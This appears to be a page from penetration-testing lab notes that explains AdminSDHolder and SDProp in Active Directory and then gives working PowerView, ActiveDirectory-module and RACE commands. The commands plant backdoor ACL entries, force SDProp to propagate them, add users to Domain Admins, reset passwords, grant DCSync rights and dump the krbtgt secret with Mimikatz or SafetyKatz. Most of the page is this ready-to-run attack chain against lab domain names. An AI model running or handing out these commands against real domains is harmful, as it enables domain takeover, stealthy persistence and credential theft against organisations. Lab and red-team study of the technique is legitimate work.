AdminSDHolder

The following security accounts and groups are protected in Active Directory Domain Services:

  • Account Operators

  • Administrator

  • Administrators

  • Backup Operators

  • Domain Admins

  • Domain Controllers

  • Enterprise Admins

  • Krbtgt

  • Print Operators

  • Read-only Domain Controllers

  • Replicator

  • Schema Admins

  • Server Operators

AdminSDHolder

Admin Security Descriptor Holder is an ACL. The purpose of the AdminSDHolder object is to provide "template" permissions for the protected accounts and groups in the domain. Every 60min, the SDProp (Security Descriptor Propagator) runs on each DC, reads the ACLs and overwrites the ACL of all protected groups.

However, if an attacker modifies the ACL for AdminSDHolder, then those modified access permissions will automatically be applied to all protected objects instead. For example, an adversary might add a user account they control to the AdminSDHolder ACL and give it full control permissions:

  • With DA privileges (Full Control/Write permissions) on the AdminSDHolder object, it can be used as a backdoor/persistence mechanism by adding a user with Full Permissions (or other interesting permissions) to the AdminSDHolder object.

    • In 60 minutes (when SDPROP runs), the user will be added with Full Control to the AC of groups like Domain Admins without actually being a member of it.

# Powerview

Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc-dollarcorp,dc=moneycorp,dc=local' -PrincipalIdentity student1 - Rights All -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
Set-DCPermissions -Method AdminSDHolder -SAMAccountName student1 -
Right GenericAll -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' -Verbose

  • Other interesting permissions (ResetPassword, WriteMembers) for a user to the AdminSDHolder,:

Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local' -PrincipalIdentity student1 -Rights ResetPassword -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc-dollarcorp,dc=moneycorp,dc=local' -PrincipalIdentity student1 -Rights WriteMembers -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose

  • Run SDProp manually using Invoke-SDPropagator.ps1 from Tools directory to make any of the above command take effect:

Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose

  • For pre-Server 2008 machines:

Invoke-SDPropagator -taskname FixUpInheritance -timeoutMinutes 1 -showProgress -Verbose

More Examples - :

  • Check the Domain Admins permission - PowerView as normal user:

Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "student1"}

  • Using ActiveDirectory Module:

(Get-Acl -Path 'AD:\CN=DomainAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access | ?{$_.IdentityReference -match 'student1'}

  • Abusing Full-control using PowerView:

Add-DomainGroupMember -Identity 'Domain Admins' -Members testda -Verbose

  • Using ActiveDirectory Module:

Add-ADGroupMember -Identity 'Domain Admins' -Members testda

  • Abusing ResetPassword using PowerView:

Set-DomainUserPassword -Identity testda -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose

  • Using ActiveDirectory Module:

Set-ADAccountPassword -Identity testda -NewPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose

  • Add Full Control rights, Powerview:

Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student1 -Rights All -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose

  • Using ActiveDirectory Module and RACE:

Set-ADACL -SamAccountName studentuser1 -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Right GenericAll -Verbose

  • Add rights for DCSync:

Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student1 -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose

  • Using ActiveDirectory Module and RACE:

Set-ADACL -SamAccountName studentuser1 -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -GUIDRight DCSync -Verbose

Execute DCSync:

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

or

C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"
PreviousUsing ACLsNextRights Abuse

Last updated